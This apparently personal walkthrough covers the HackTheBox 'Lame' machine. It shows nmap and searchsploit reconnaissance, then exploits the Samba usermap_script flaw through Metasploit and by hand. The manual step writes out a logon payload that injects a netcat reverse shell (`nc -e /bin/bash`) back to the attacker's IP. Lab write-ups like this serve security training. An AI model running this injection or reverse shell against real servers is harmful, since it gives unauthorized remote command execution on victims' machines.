Lame-HackTheBox Tutorial

Created by Deadeye 1633019013

Info about the machine

Lame is the first ever box created on HackTheBox.It's difficulty is easy

MachineIP
MoreDetails

Scanning the network

Command used: nmap -sC -sV 10.10.10.3

nmap

We found out that there is a vulnerable FTP

Command used: searchsploit vsftpd 2.3.4

VulnerableFTP

We generated an exploit,but when we tried to executed it failed

Vulnerable Samba

This module exploits a command execution vulnerability in Samba versions 3.0.20 through 3.0.25rc3 when using the non-default “username map script” configuration option. By specifying a username containing shell mmeta characters attackers can execute arbitrary commands. No authentication is needed to exploit this vulnerability since this option is used to map usernames pbeforeauthentication!

Command used: searchsploit Samba 3.0.20

Samba

Exploiting the Server

For exploiting we used Metasploit

Commands used: msf5 >use exploit/multi/samba/usermap_script
set RHOSTS 10.10.10.3
exploit

exploit

Manual Exploiting

logon “./=`nohup nc -e /bin/bash 10.10.14.7 4444`"
logon:- it is used to login into smb
nohup:-run a command immune to hangups, with output to a non-tty

ManualEXP

Own User

The User Flag was at Makis user

user

Own Root

root